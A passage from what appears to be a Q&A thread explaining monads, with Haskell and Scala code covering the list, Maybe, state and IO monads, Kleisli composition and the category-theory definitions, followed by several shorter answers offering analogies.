encodes nonlinear computation [t] yielding a natural amount 0, 1, ... of results t.
instance Functor [] where
map :: (a -> b) -> ([a] -> [b])
map f (x : xs) = f x : map f xs
map _ [] = []
instance Monad [] where
return :: t -> [t]
return = (: [])
(=<<) :: (a -> [b]) -> [a] -> [b]
f =<< (x : xs) = f x ++ (f =<< xs)
_ =<< [] = []
Extension =<< concatenates ++ all lists [b] resulting from applications f x of a Kleisli arrow a -> [b] to elements of [a] into a single result list [b].
Let the proper divisors of a positive integer n be
divisors :: Integral t => t -> [t]
divisors n = filter (`divides` n) [2 .. n - 1]
divides :: Integral t => t -> t -> Bool
(`divides` n) = (== 0) . (n `rem`)
then
forall n. let { f = f <=< divisors } in f n = []
In defining the monad type class, instead of extension =<<, the Haskell standard uses its flip, the bind operator >>=.
class Applicative m => Monad m where
(>>=) :: forall a b. m a -> (a -> m b) -> m b
(>>) :: forall a b. m a -> m b -> m b
m >> k = m >>= \ _ -> k
{-# INLINE (>>) #-}
return :: a -> m a
return = pure
For simplicity's sake, this explanation uses the type class hierarchy
class Functor f
class Functor m => Monad m
In Haskell, the current standard hierarchy is
class Functor f
class Functor p => Applicative p
class Applicative m => Monad m
because not only is every monad a functor, but every applicative is a functor and every monad is an applicative, too.
Using the list monad, the imperative pseudocode
for a in (1, ..., 10)
for b in (1, ..., 10)
p <- a * b
if even(p)
yield p
roughly translates to the do block,
do a <- [1 .. 10]
b <- [1 .. 10]
let p = a * b
guard (even p)
return p
the equivalent monad comprehension,
[ p | a <- [1 .. 10], b <- [1 .. 10], let p = a * b, even p ]
and the expression
[1 .. 10] >>= (\ a ->
[1 .. 10] >>= (\ b ->
let p = a * b in
guard (even p) >> -- [ () | even p ] >>
return p
)
)
Do notation and monad comprehensions are syntactic sugar for nested bind expressions. The bind operator is used for local name binding of monadic results.
let x = v in e = (\ x -> e) $ v = v & (\ x -> e)
do { r <- m; c } = (\ r -> c) =<< m = m >>= (\ r -> c)
where
(&) :: a -> (a -> b) -> b
(&) = flip ($)
infixl 0 &
The guard function is defined
guard :: Additive m => Bool -> m ()
guard True = return ()
guard False = fail
where the unit type or “empty tuple”
data () = ()
Additive monads that support choice and failure can be abstracted over using a type class
class Monad m => Additive m where
fail :: m t
(<|>) :: m t -> m t -> m t
infixl 3 <|>
instance Additive Maybe where
fail = Nothing
Nothing <|> m = m
m <|> _ = m
instance Additive [] where
fail = []
(<|>) = (++)
where fail and <|> form a monoid forall k l m.
k <|> fail = k
fail <|> l = l
(k <|> l) <|> m = k <|> (l <|> m)
and fail is the absorbing/annihilating zero element of additive monads
_ =<< fail = fail
If in
guard (even p) >> return p
even p is true, then the guard produces [()], and, by the definition of >>, the local constant function
\ _ -> return p
is applied to the result (). If false, then the guard produces the list monad’s fail ( [] ), which yields no result for a Kleisli arrow to be applied >> to, so this p is skipped over.
State
Infamously, monads are used to encode stateful computation.
A state processor is a function
forall st t. st -> (t, st)
that transitions a state st and yields a result t. The state st can be anything. Nothing, flag, count, array, handle, machine, world.
The type of state processors is usually called
type State st t = st -> (t, st)
The state processor monad is the kinded * -> * functor State st. Kleisli arrows of the state processor monad are functions
forall st a b. a -> (State st) b
In canonical Haskell, the lazy version of the state processor monad is defined
newtype State st t = State { stateProc :: st -> (t, st) }
instance Functor (State st) where
map :: (a -> b) -> ((State st) a -> (State st) b)
map f (State p) = State $ \ s0 -> let (x, s1) = p s0
in (f x, s1)
instance Monad (State st) where
return :: t -> (State st) t
return x = State $ \ s -> (x, s)
(=<<) :: (a -> (State st) b) -> (State st) a -> (State st) b
f =<< (State p) = State $ \ s0 -> let (x, s1) = p s0
in stateProc (f x) s1
A state processor is run by supplying an initial state:
run :: State st t -> st -> (t, st)
run = stateProc
eval :: State st t -> st -> t
eval = fst . run
exec :: State st t -> st -> st
exec = snd . run
State access is provided by primitives get and put, methods of abstraction over stateful monads:
{-# LANGUAGE MultiParamTypeClasses, FunctionalDependencies #-}
class Monad m => Stateful m st | m -> st where
get :: m st
put :: st -> m ()
m -> st declares a functional dependency of the state type st on the monad m; that a State t, for example, will determine the state type to be t uniquely.
instance Stateful (State st) st where
get :: State st st
get = State $ \ s -> (s, s)
put :: st -> State st ()
put s = State $ \ _ -> ((), s)
with the unit type used analogously to void in C.
modify :: Stateful m st => (st -> st) -> m ()
modify f = do
s <- get
put (f s)
gets :: Stateful m st => (st -> t) -> m t
gets f = do
s <- get
return (f s)
gets is often used with record field accessors.
The state monad equivalent of the variable threading
let s0 = 34
s1 = (+ 1) s0
n = (* 12) s1
s2 = (+ 7) s1
in (show n, s2)
where s0 :: Int, is the equally referentially transparent, but infinitely more elegant and practical
(flip run) 34
(do
modify (+ 1)
n <- gets (* 12)
modify (+ 7)
return (show n)
)
modify (+ 1) is a computation of type State Int (), except for its effect equivalent to return ().
(flip run) 34
(modify (+ 1) >>
gets (* 12) >>= (\ n ->
modify (+ 7) >>
return (show n)
)
)
The monad law of associativity can be written in terms of >>= forall m f g.
(m >>= f) >>= g = m >>= (\ x -> f x >>= g)
or
do { do { do {
r1 <- do { x <- m; r0 <- m;
r0 <- m; = do { = r1 <- f r0;
f r0 r1 <- f x; g r1
}; g r1 }
g r1 }
} }
Like in expression-oriented programming (e.g. Rust), the last statement of a block represents its yield. The bind operator is sometimes called a “programmable semicolon”.
Iteration control structure primitives from structured imperative programming are emulated monadically
for :: Monad m => (a -> m b) -> [a] -> m ()
for f = foldr ((>>) . f) (return ())
while :: Monad m => m Bool -> m t -> m ()
while c m = do
b <- c
if b then m >> while c m
else return ()
forever :: Monad m => m t
forever m = m >> forever m
Input/Output
data World
The I/O world state processor monad is a reconciliation of pure Haskell and the real world, of functional denotative and imperative operational semantics. A close analogue of the actual strict implementation:
type IO t = World -> (t, World)
Interaction is facilitated by impure primitives
getChar :: IO Char
putChar :: Char -> IO ()
readFile :: FilePath -> IO String
writeFile :: FilePath -> String -> IO ()
hSetBuffering :: Handle -> BufferMode -> IO ()
hTell :: Handle -> IO Integer
. . . . . .
The impurity of code that uses IO primitives is permanently protocolized by the type system. Because purity is awesome, what happens in IO, stays in IO.
unsafePerformIO :: IO t -> t
Or, at least, should.
The type signature of a Haskell program
main :: IO ()
main = putStrLn "Hello, World!"
expands to
World -> ((), World)
A function that transforms a world.
Epilogue
The category whiches objects are Haskell types and whiches morphisms are functions between Haskell types is, “fast and loose”, the category Hask.
A functor T is a mapping from a category C to a category D; for each object in C an object in D
Tobj : Obj(C) -> Obj(D)
f :: * -> *
and for each morphism in C a morphism in D
Tmor : HomC(X, Y) -> HomD(Tobj(X), Tobj(Y))
map :: (a -> b) -> (f a -> f b)
where X, Y are objects in C. HomC(X, Y) is the homomorphism class of all morphisms X -> Y in C. The functor must preserve morphism identity and composition, the “structure” of C, in D.
Tmor Tobj
T(id) = id : T(X) -> T(X) Identity
T(f) . T(g) = T(f . g) : T(X) -> T(Z) Composition
The Kleisli category of a category C is given by a Kleisli triple
<T, eta, _*>
of an endofunctor
T : C -> C
(f), an identity morphism eta (return), and an extension operator * (=<<).
Each Kleisli morphism in Hask
f : X -> T(Y)
f :: a -> m b
by the extension operator
(_)* : Hom(X, T(Y)) -> Hom(T(X), T(Y))
(=<<) :: (a -> m b) -> (m a -> m b)
is given a morphism in Hask’s Kleisli category
f* : T(X) -> T(Y)
(f =<<) :: m a -> m b
Composition in the Kleisli category .T is given in terms of extension
f .T g = f* . g : X -> T(Z)
f <=< g = (f =<<) . g :: a -> m c
and satisfies the category axioms
eta .T g = g : Y -> T(Z) Left identity
return <=< g = g :: b -> m c
f .T eta = f : Z -> T(U) Right identity
f <=< return = f :: c -> m d
(f .T g) .T h = f .T (g .T h) : X -> T(U) Associativity
(f <=< g) <=< h = f <=< (g <=< h) :: a -> m d
which, applying the equivalence transformations
eta .T g = g
eta* . g = g By definition of .T
eta* . g = id . g forall f. id . f = f
eta* = id forall f g h. f . h = g . h ==> f = g
(f .T g) .T h = f .T (g .T h)
(f* . g)* . h = f* . (g* . h) By definition of .T
(f* . g)* . h = f* . g* . h . is associative
(f* . g)* = f* . g* forall f g h. f . h = g . h ==> f = g
in terms of extension are canonically given
eta* = id : T(X) -> T(X) Left identity
(return =<<) = id :: m t -> m t
f* . eta = f : Z -> T(U) Right identity
(f =<<) . return = f :: c -> m d
(f* . g)* = f* . g* : T(X) -> T(Z) Associativity
(((f =<<) . g) =<<) = (f =<<) . (g =<<) :: m a -> m c
Monads can also be defined in terms not of Kleislian extension, but a natural transformation mu, in programming called join. A monad is defined in terms of mu as a triple over a category C, of an endofunctor
T : C -> C
f :: * -> *
and two natural tranformations
eta : Id -> T
return :: t -> f t
mu : T . T -> T
join :: f (f t) -> f t
satisfying the equivalences
mu . T(mu) = mu . mu : T . T . T -> T . T Associativity
join . map join = join . join :: f (f (f t)) -> f t
mu . T(eta) = mu . eta = id : T -> T Identity
join . map return = join . return = id :: f t -> f t
The monad type class is then defined
class Functor m => Monad m where
return :: t -> m t
join :: m (m t) -> m t
The canonical mu implementation of the option monad:
instance Monad Maybe where
return = Just
join (Just m) = m
join Nothing = Nothing
The concat function
concat :: [[a]] -> [a]
concat (x : xs) = x ++ concat xs
concat [] = []
is the join of the list monad.
instance Monad [] where
return :: t -> [t]
return = (: [])
(=<<) :: (a -> [b]) -> ([a] -> [b])
(f =<<) = concat . map f
Implementations of join can be translated from extension form using the equivalence
mu = id* : T . T -> T
join = (id =<<) :: m (m t) -> m t
The reverse translation from mu to extension form is given by
f* = mu . T(f) : T(X) -> T(Y)
(f =<<) = join . map f :: m a -> m b
*
*Philip Wadler: Monads for functional programming
*Simon L Peyton Jones, Philip Wadler: Imperative functional programming
*Jonathan M. D. Hill, Keith Clarke: An introduction to category theory, category theory monads, and their relationship to functional programming
´
*Kleisli category
*Eugenio Moggi: Notions of computation and monads
*What a monad is not
But why should a theory so abstract be of any use for programming?
The answer is simple: as computer scientists, we value abstraction! When we design the interface to a software component, we want it to reveal as little as possible about the implementation. We want to be able to replace the implementation with many alternatives, many other ‘instances’ of the same ‘concept’. When we design a generic interface to many program libraries, it is even more important that the interface we choose have a variety of implementations. It is the generality of the monad concept which we value so highly, it is because category theory is so abstract that its concepts are so useful for programming.
It is hardly suprising, then, that the generalisation of monads that we present below also has a close connection to category theory. But we stress that our purpose is very practical: it is not to ‘implement category theory’, it is to find a more general way to structure combinator libraries. It is simply our good fortune that mathematicians have already done much of the work for us!
from Generalising Monads to Arrows by John Hughes
A: A monad is a datatype that has two operations: >>= (aka bind) and return (aka unit). return takes an arbitrary value and creates an instance of the monad with it. >>= takes an instance of the monad and maps a function over it. (You can see already that a monad is a strange kind of datatype, since in most programming languages you couldn't write a function that takes an arbitrary value and creates a type from it. Monads use a kind of parametric polymorphism.)
In Haskell notation, the monad interface is written
class Monad m where
return :: a -> m a
(>>=) :: forall a b . m a -> (a -> m b) -> m b
These operations are supposed to obey certain "laws", but that's not terrifically important: the "laws" just codify the way sensible implementations of the operations ought to behave (basically, that >>= and return ought to agree about how values get transformed into monad instances and that >>= is associative).
Monads are not just about state and I/O: they abstract a common pattern of computation that includes working with state, I/O, exceptions, and non-determinism. Probably the simplest monads to understand are lists and option types:
instance Monad [ ] where
[] >>= k = []
(x:xs) >>= k = k x ++ (xs >>= k)
return x = [x]
instance Monad Maybe where
Just x >>= k = k x
Nothing >>= k = Nothing
return x = Just x
where [] and : are the list constructors, ++ is the concatenation operator, and Just and Nothing are the Maybe constructors. Both of these monads encapsulate common and useful patterns of computation on their respective data types (note that neither has anything to do with side effects or I/O).
You really have to play around writing some non-trivial Haskell code to appreciate what monads are about and why they are useful.
A: You should first understand what a functor is. Before that, understand higher-order functions.
A higher-order function is simply a function that takes a function as an argument.
A functor is any type construction T for which there exists a higher-order function, call it map, that transforms a function of type a -> b (given any two types a and b) into a function T a -> T b. This map function must also obey the laws of identity and composition such that the following expressions return true for all p and q (Haskell notation):
map id = id
map (p . q) = map p . map q
For example, a type constructor called List is a functor if it comes equipped with a function of type (a -> b) -> List a -> List b which obeys the laws above. The only practical implementation is obvious. The resulting List a -> List b function iterates over the given list, calling the (a -> b) function for each element, and returns the list of the results.
A monad is essentially just a functor T with two extra methods, join, of type T (T a) -> T a, and unit (sometimes called return, fork, or pure) of type a -> T a. For lists in Haskell:
join :: [[a]] -> [a]
pure :: a -> [a]
Why is that useful? Because you could, for example, map over a list with a function that returns a list. Join takes the resulting list of lists and concatenates them. List is a monad because this is possible.
You can write a function that does map, then join. This function is called bind, or flatMap, or (>>=), or (=<<). This is normally how a monad instance is given in Haskell.
A monad has to satisfy certain laws, namely that join must be associative. This means that if you have a value x of type [[[a]]] then join (join x) should equal join (map join x). And pure must be an identity for join such that join (pure x) == x.
A: Monads Are Not Metaphors, but a practically useful abstraction emerging from a common pattern, as Daniel Spiewak explains.
A: Explaining "what is a monad" is a bit like saying "what is a number?" We use numbers all the time. But imagine you met someone who didn't know anything about numbers. How the heck would you explain what numbers are? And how would you even begin to describe why that might be useful?
What is a monad? The short answer: It's a specific way of chaining operations together.
In essence, you're writing execution steps and linking them together with the "bind function". (In Haskell, it's named >>=.) You can write the calls to the bind operator yourself, or you can use syntax sugar which makes the compiler insert those function calls for you. But either way, each step is separated by a call to this bind function.
So the bind function is like a semicolon; it separates the steps in a process. The bind function's job is to take the output from the previous step, and feed it into the next step.
That doesn't sound too hard, right? But there is more than one kind of monad. Why? How?
Well, the bind function can just take the result from one step, and feed it to the next step. But if that's "all" the monad does... that actually isn't very useful. And that's important to understand: Every useful monad does something else in addition to just being a monad. Every useful monad has a "special power", which makes it unique.
(A monad that does nothing special is called the "identity monad". Rather like the identity function, this sounds like an utterly pointless thing, yet turns out not to be... But that's another story™.)
Basically, each monad has its own implementation of the bind function. And you can write a bind function such that it does hoopy things between execution steps. For example:
*
*If each step returns a success/failure indicator, you can have bind execute the next step only if the previous one succeeded. In this way, a failing step aborts the whole sequence "automatically", without any conditional testing from you. (The Failure Monad.)
*Extending this idea, you can implement "exceptions". (The Error Monad or Exception Monad.) Because you're defining them yourself rather than it being a language feature, you can define how they work. (E.g., maybe you want to ignore the first two exceptions and only abort when a third exception is thrown.)
*You can make each step return multiple results, and have the bind function loop over them, feeding each one into the next step for you. In this way, you don't have to keep writing loops all over the place when dealing with multiple results. The bind function "automatically" does all that for you. (The List Monad.)
*As well as passing a "result" from one step to another, you can have the bind function pass extra data around as well. This data now doesn't show up in your source code, but you can still access it from anywhere, without having to manually pass it to every function. (The Reader Monad.)
*You can make it so that the "extra data" can be replaced. This allows you to simulate destructive updates, without actually doing destructive updates. (The State Monad and its cousin the Writer Monad.)
*Because you're only simulating destructive updates, you can trivially do things that would be impossible with real destructive updates. For example, you can undo the last update, or revert to an older version.
*You can make a monad where calculations can be paused, so you can pause your program, go in and tinker with internal state data, and then resume it.
*You can implement "continuations" as a monad. This allows you to break people's minds!
All of this and more is possible with monads. Of course, all of this is also perfectly possible without monads too. It's just drastically easier using monads.
A: In addition to the excellent answers above, let me offer you a link to the following article (by Patrick Thomson) which explains monads by relating the concept to the JavaScript library jQuery (and its way of using "method chaining" to manipulate the DOM):
jQuery is a Monad
The jQuery documentation itself doesn't refer to the term "monad" but talks about the "builder pattern" which is probably more familiar. This doesn't change the fact that you have a proper monad there maybe without even realizing it.
A: A monad is a way of combining computations together that share a common context. It is like building a network of pipes. When constructing the network, there is no data flowing through it. But when I have finished piecing all the bits together with 'bind' and 'return' then I invoke something like runMyMonad monad data and the data flows through the pipes.
A: In practice, monad is a custom implementation of function composition operator that takes care of side effects and incompatible input and return values (for chaining).
A: [Disclaimer: I am still trying to fully grok monads. The following is just what I have understood so far. If it’s wrong, hopefully someone knowledgeable will call me on the carpet.]
Arnar wrote:
Monads are simply a way to wrapping things and provide methods to do operations on the wrapped stuff without unwrapping it.
That’s precisely it. The idea goes like this:
*
*You take some kind of value and wrap it with some additional information. Just like the value is of a certain kind (eg. an integer or a string), so the additional information is of a certain kind.
E.g., that extra information might be a Maybe or an IO.
*Then you have some operators that allow you to operate on the wrapped data while carrying along that additional information. These operators use the additional information to decide how to change the behaviour of the operation on the wrapped value.
E.g., a Maybe Int can be a Just Int or Nothing. Now, if you add a Maybe Int to a Maybe Int, the operator will check to see if they are both Just Ints inside, and if so, will unwrap the Ints, pass them the addition operator, re-wrap the resulting Int into a new Just Int (which is a valid Maybe Int), and thus return a Maybe Int. But if one of them was a Nothing inside, this operator will just immediately return Nothing, which again is a valid Maybe Int. That way, you can pretend that your Maybe Ints are just normal numbers and perform regular math on them. If you were to get a Nothing, your equations will still produce the right result – without you having to litter checks for Nothing everywhere.
But the example is just what happens for Maybe. If the extra information was an IO, then that special operator defined for IOs would be called instead, and it could do something totally different before performing the addition. (OK, adding two IO Ints together is probably nonsensical – I’m not sure yet.) (Also, if you paid attention to the Maybe example, you have noticed that “wrapping a value with extra stuff” is not always correct. But it’s hard to be exact, correct and precise without being inscrutable.)
Basically, “monad” roughly means “pattern”. But instead of a book full of informally explained and specifically named Patterns, you now have a language construct – syntax and all – that allows you to declare new patterns as things in your program. (The imprecision here is all the patterns have to follow a particular form, so a monad is not quite as generic as a pattern. But I think that’s the closest term that most people know and understand.)
And that is why people find monads so confusing: because they are such a generic concept. To ask what makes something a monad is similarly vague as to ask what makes something a pattern.
But think of the implications of having syntactic support in the language for the idea of a pattern: instead of having to read the Gang of Four book and memorise the construction of a particular pattern, you just write code that implements this pattern in an agnostic, generic way once and then you are done! You can then reuse this pattern, like Visitor or Strategy or Façade or whatever, just by decorating the operations in your code with it, without having to re-implement it over and over!
So that is why people who understand monads find them so useful: it’s not some ivory tower concept that intellectual snobs pride themselves on understanding (OK, that too of course, teehee), but actually makes code simpler.
A: The two things that helped me best when learning about there were:
Chapter 8, "Functional Parsers," from Graham Hutton's book Programming in Haskell. This doesn't mention monads at all, actually, but if you can work through chapter and really understand everything in it, particularly how a sequence of bind operations is evaluated, you'll understand the internals of monads. Expect this to take several tries.
The tutorial All About Monads. This gives several good examples of their use, and I have to say that the analogy in Appendex I worked for me.
A: Monoid appears to be something that ensures that all operations defined on a Monoid and a supported type will always return a supported type inside the Monoid. Eg, Any number + Any number = A number, no errors.
Whereas division accepts two fractionals, and returns a fractional, which defined division by zero as Infinity in haskell somewhy(which happens to be a fractional somewhy)...
In any case, it appears Monads are just a way to ensure that your chain of operations behaves in a predictable way, and a function that claims to be Num -> Num, composed with another function of Num->Num called with x does not say, fire the missiles.
On the other hand, if we have a function which does fire the missiles, we can compose it with other functions which also fire the missiles, because our intent is clear -- we want to fire the missiles -- but it won't try printing "Hello World" for some odd reason.
In Haskell, main is of type IO (), or IO [()], the distiction is strange and I will not discuss it but here's what I think happens:
If I have main, I want it to do a chain of actions, the reason I run the program is to produce an effect -- usually though IO. Thus I can chain IO operations together in main in order to -- do IO, nothing else.
If I try to do something which does not "return IO", the program will complain that the chain does not flow, or basically "How does this relate to what we are trying to do -- an IO action", it appears to force the programmer to keep their train of thought, without straying off and thinking about firing the missiles, while creating algorithms for sorting -- which does not flow.
Basically, Monads appear to be a tip to the compiler that "hey, you know this function that returns a number here, it doesn't actually always work, it can sometimes produce a Number, and sometimes Nothing at all, just keep this in mind". Knowing this, if you try to assert a monadic action, the monadic action may act as a compile time exception saying "hey, this isn't actually a number, this CAN be a number, but you can't assume this, do something to ensure that the flow is acceptable." which prevents unpredictable program behavior -- to a fair extent.
It appears monads are not about purity, nor control, but about maintaining an identity of a category on which all behavior is predictable and defined, or does not compile. You cannot do nothing when you are expected to do something, and you cannot do something if you are expected to do nothing (visible).
The biggest reason I could think of for Monads is -- go look at Procedural/OOP code, and you will notice that you do not know where the program starts, nor ends, all you see is a lot of jumping and a lot of math,magic,and missiles. You will not be able to maintain it, and if you can, you will spend quite a lot of time wrapping your mind around the whole program before you can understand any part of it, because modularity in this context is based on interdependant "sections" of code, where code is optimized to be as related as possible for promise of efficiency/inter-relation. Monads are very concrete, and well defined by definition, and ensure that the flow of program is possible to analyze, and isolate parts which are hard to analyze -- as they themselves are monads. A monad appears to be a "comprehensible unit which is predictable upon its full understanding" -- If you understand "Maybe" monad, there's no possible way it will do anything except be "Maybe", which appears trivial, but in most non monadic code, a simple function "helloworld" can fire the missiles, do nothing, or destroy the universe or even distort time -- we have no idea nor have any guarantees that IT IS WHAT IT IS. A monad GUARANTEES that IT IS WHAT IT IS. which is very powerful.
All things in "real world" appear to be monads, in the sense that it is bound by definite observable laws preventing confusion. This does not mean we have to mimic all the operations of this object to create classes, instead we can simply say "a square is a square", nothing but a square, not even a rectangle nor a circle, and "a square has area of the length of one of it's existing dimensions multiplied by itself. No matter what square you have, if it's a square in 2D space, it's area absolutely cannot be anything but its length squared, it's almost trivial to prove. This is very powerful because we do not need to make assertions to make sure that our world is the way it is, we just use implications of reality to prevent our programs from falling off track.
Im pretty much guaranteed to be wrong but I think this could help somebody out there, so hopefully it helps somebody.
A: In the context of Scala you will find the following to be the simplest definition. Basically flatMap (or bind) is 'associative' and there exists an identity.
trait M[+A] {
def flatMap[B](f: A => M[B]): M[B] // AKA bind
// Pseudo Meta Code
def isValidMonad: Boolean = {
// for every parameter the following holds
def isAssociativeOn[X, Y, Z](x: M[X], f: X => M[Y], g: Y => M[Z]): Boolean =
x.flatMap(f).flatMap(g) == x.flatMap(f(_).flatMap(g))
// for every parameter X and x, there exists an id
// such that the following holds
def isAnIdentity[X](x: M[X], id: X => M[X]): Boolean =
x.flatMap(id) == x
}
}
E.g.
// These could be any functions
val f: Int => Option[String] = number => if (number == 7) Some("hello") else None
val g: String => Option[Double] = string => Some(3.14)
// Observe these are identical. Since Option is a Monad
// they will always be identical no matter what the functions are
scala> Some(7).flatMap(f).flatMap(g)
res211: Option[Double] = Some(3.14)
scala> Some(7).flatMap(f(_).flatMap(g))
res212: Option[Double] = Some(3.14)
// As Option is a Monad, there exists an identity:
val id: Int => Option[Int] = x => Some(x)
// Observe these are identical
scala> Some(7).flatMap(id)
res213: Option[Int] = Some(7)
scala> Some(7)
res214: Some[Int] = Some(7)
NOTE Strictly speaking the definition of a Monad in functional programming is not the same as the definition of a Monad in Category Theory, which is defined in turns of map and flatten. Though they are kind of equivalent under certain mappings. This presentations is very good: http://www.slideshare.net/samthemonad/monad-presentation-scala-as-a-category
A: This answer begins with a motivating example, works through the example, derives an example of a monad, and formally defines "monad".
Consider these three functions in pseudocode:
f(<x, messages>) := <x, messages "called f. ">
g(<x, messages>) := <x, messages "called g. ">
wrap(x) := <x, "">
f takes an ordered pair of the form <x, messages> and returns an ordered pair. It leaves the first item untouched and appends "called f. " to the second item. Same with g.
You can compose these functions and get your original value, along with a string that shows which order the functions were called in:
f(g(wrap(x)))
= f(g(<x, "">))
= f(<x, "called g. ">)
= <x, "called g. called f. ">
You dislike the fact that f and g are responsible for appending their own log messages to the previous logging information. (Just imagine for the sake of argument that instead of appending strings, f and g must perform complicated logic on the second item of the pair. It would be a pain to repeat that complicated logic in two -- or more -- different functions.)
You prefer to write simpler functions:
f(x) := <x, "called f. ">
g(x) := <x, "called g. ">
wrap(x) := <x, "">
But look at what happens when you compose them:
f(g(wrap(x)))
= f(g(<x, "">))
= f(<<x, "">, "called g. ">)
= <<<x, "">, "called g. ">, "called f. ">
The problem is that passing a pair into a function does not give you what you want. But what if you could feed a pair into a function:
feed(f, feed(g, wrap(x)))
= feed(f, feed(g, <x, "">))
= feed(f, <x, "called g. ">)
= <x, "called g. called f. ">
Read feed(f, m) as "feed m into f". To feed a pair <x, messages> into a function f is to pass x into f, get <y, message> out of f, and return <y, messages message>.
feed(f, <x, messages>) := let <y, message> = f(x)
in <y, messages message>
Notice what happens when you do three things with your functions:
First: if you wrap a value and then feed the resulting pair into a function:
feed(f, wrap(x))
= feed(f, <x, "">)
= let <y, message> = f(x)
in <y, "" message>
= let <y, message> = <x, "called f. ">
in <y, "" message>
= <x, "" "called f. ">
= <x, "called f. ">
= f(x)
That is the same as passing the value into the function.
Second: if you feed a pair into wrap:
feed(wrap, <x, messages>)
= let <y, message> = wrap(x)
in <y, messages message>
= let <y, message> = <x, "">
in <y, messages message>
= <x, messages "">
= <x, messages>
That does not change the pair.
Third: if you define a function that takes x and feeds g(x) into f:
h(x) := feed(f, g(x))
and feed a pair into it:
feed(h, <x, messages>)
= let <y, message> = h(x)
in <y, messages message>
= let <y, message> = feed(f, g(x))
in <y, messages message>
= let <y, message> = feed(f, <x, "called g. ">)
in <y, messages message>
= let <y, message> = let <z, msg> = f(x)
in <z, "called g. " msg>
in <y, messages message>
= let <y, message> = let <z, msg> = <x, "called f. ">
in <z, "called g. " msg>
in <y, messages message>
= let <y, message> = <x, "called g. " "called f. ">
in <y, messages message>
= <x, messages "called g. " "called f. ">
= feed(f, <x, messages "called g. ">)
= feed(f, feed(g, <x, messages>))
That is the same as feeding the pair into g and feeding the resulting pair into f.
You have most of a monad. Now you just need to know about the data types in your program.
What type of value is <x, "called f. ">? Well, that depends on what type of value x is. If x is of type t, then your pair is a value of type "pair of t and string". Call that type M t.
M is a type constructor: M alone does not refer to a type, but M _ refers to a type once you fill in the blank with a type. An M int is a pair of an int and a string. An M string is a pair of a string and a string. Etc.
Congratulations, you have created a monad!
Formally, your monad is the tuple <M, feed, wrap>.
A monad is a tuple <M, feed, wrap> where:
*
*M is a type constructor.
*feed takes a (function that takes a t and returns an M u) and an M t and returns an M u.
*wrap takes a v and returns an M v.
t, u, and v are any three types that may or may not be the same. A monad satisfies the three properties you proved for your specific monad:
*
*Feeding a wrapped t into a function is the same as passing the unwrapped t into the function.
Formally: feed(f, wrap(x)) = f(x)
*Feeding an M t into wrap does nothing to the M t.
Formally: feed(wrap, m) = m
*Feeding an M t (call it m) into a function that
*
*passes the t into g
*gets an M u (call it n) from g
*feeds n into f
is the same as
*
*feeding m into g
*getting n from g
*feeding n into f
Formally: feed(h, m) = feed(f, feed(g, m)) where h(x) := feed(f, g(x))
Typically, feed is called bind (AKA >>= in Haskell) and wrap is called return.
A: I will try to explain Monad in the context of Haskell.
In functional programming, function composition is important. It allows our program to consist of small, easy-to-read functions.
Let's say we have two functions: g :: Int -> String and f :: String -> Bool.
We can do (f . g) x, which is just the same as f (g x), where x is an Int value.
When doing composition/applying the result of one function to another, having the types match up is important. In the above case, the type of the result returned by g must be the same as the type accepted by f.
But sometimes values are in contexts, and this makes it a bit less easy to line up types. (Having values in contexts is very useful. For example, the Maybe Int type represents an Int value that may not be there, the IO String type represents a String value that is there as a result of performing some side effects.)
Let's say we now have g1 :: Int -> Maybe String and f1 :: String -> Maybe Bool. g1 and f1 are very similar to g and f respectively.
We can't do (f1 . g1) x or f1 (g1 x), where x is an Int value. The type of the result returned by g1 is not what f1 expects.
We could compose f and g with the . operator, but now we can't compose f1 and g1 with .. The problem is that we can't straightforwardly pass a value in a context to a function that expects a value that is not in a context.
Wouldn't it be nice if we introduce an operator to compose g1 and f1, such that we can write (f1 OPERATOR g1) x? g1 returns a value in a context. The value will be taken out of context and applied to f1. And yes, we have such an operator. It's <=<.
We also have the >>= operator that does for us the exact same thing, though in a slightly different syntax.
We write: g1 x >>= f1. g1 x is a Maybe Int value. The >>= operator helps take that Int value out of the "perhaps-not-there" context, and apply it to f1. The result of f1, which is a Maybe Bool, will be the result of the entire >>= operation.
And finally, why is Monad useful? Because Monad is the type class that defines the >>= operator, very much the same as the Eq type class that defines the == and /= operators.
To conclude, the Monad type class defines the >>= operator that allows us to pass values in a context (we call these monadic values) to functions that don't expect values in a context. The context will be taken care of.
If there is one thing to remember here, it is that Monads allow function composition that involves values in contexts.
A: A Monad is an Applicative (i.e. something that you can lift binary -- hence, "n-ary" -- functions to,(1) and inject pure values into(2)) Functor (i.e. something that you can map over,(3) i.e. lift unary functions to(3)) with the added ability to flatten the nested datatype (with each of the three notions following its corresponding set of laws). In Haskell, this flattening operation is called join.
The general (generic, parametric) type of this "join" operation is:
join :: Monad m => m (m a) -> m a
for any monad m (NB all ms in the type are the same!).
A specific m monad defines its specific version of join working for any value type a "carried" by the monadic values of type m a. Some specific types are:
join :: [[a]] -> [a] -- for lists, or nondeterministic values
join :: Maybe (Maybe a) -> Maybe a -- for Maybe, or optional values
join :: IO (IO a) -> IO a -- for I/O-produced values
The join operation converts an m-computation producing an m-computation of a-type values into one combined m-computation of a-type values. This allows for combination of computation steps into one larger computation.
This computation steps-combining "bind" (>>=) operator simply uses fmap and join together, i.e.
(ma >>= k) == join (fmap k ma)
{-
ma :: m a -- `m`-computation which produces `a`-type values
k :: a -> m b -- create new `m`-computation from an `a`-type value
fmap k ma :: m ( m b ) -- `m`-computation of `m`-computation of `b`-type values
(m >>= k) :: m b -- `m`-computation which produces `b`-type values
-}
Conversely, join can be defined via bind, join mma == join (fmap id mma) == mma >>= id where id ma = ma -- whichever is more convenient for a given type m.
For monads, both the do-notation and its equivalent bind-using code,
do { x <- mx ; y <- my ; return (f x y) } -- x :: a , mx :: m a
-- y :: b , my :: m b
mx >>= (\x -> -- nested
my >>= (\y -> -- lambda
return (f x y) )) -- functions
can be read as
first "do" mx, and when it's done, get its "result" as x and let me use it to "do" something else.
In a given do block, each of the values to the right of the binding arrow <- is of type m a for some type a and the same monad m throughout the do block.
return x is a neutral m-computation which just produces the pure value x it is given, such that binding any m-computation with return does not change that computation at all.
(1) with liftA2 :: Applicative m => (a -> b -> c) -> m a -> m b -> m c
(2) with pure :: Applicative m => a -> m a
(3) with fmap :: Functor m => (a -> b) -> m a -> m b
There's also the equivalent Monad methods,
liftM2 :: Monad m => (a -> b -> c) -> m a -> m b -> m c
return :: Monad m => a -> m a
liftM :: Monad m => (a -> b) -> m a -> m b
Given a monad, the other definitions could be made as
pure a = return a
fmap f ma = do { a <- ma ; return (f a) }
liftA2 f ma mb = do { a <- ma ; b <- mb ; return (f a b) }
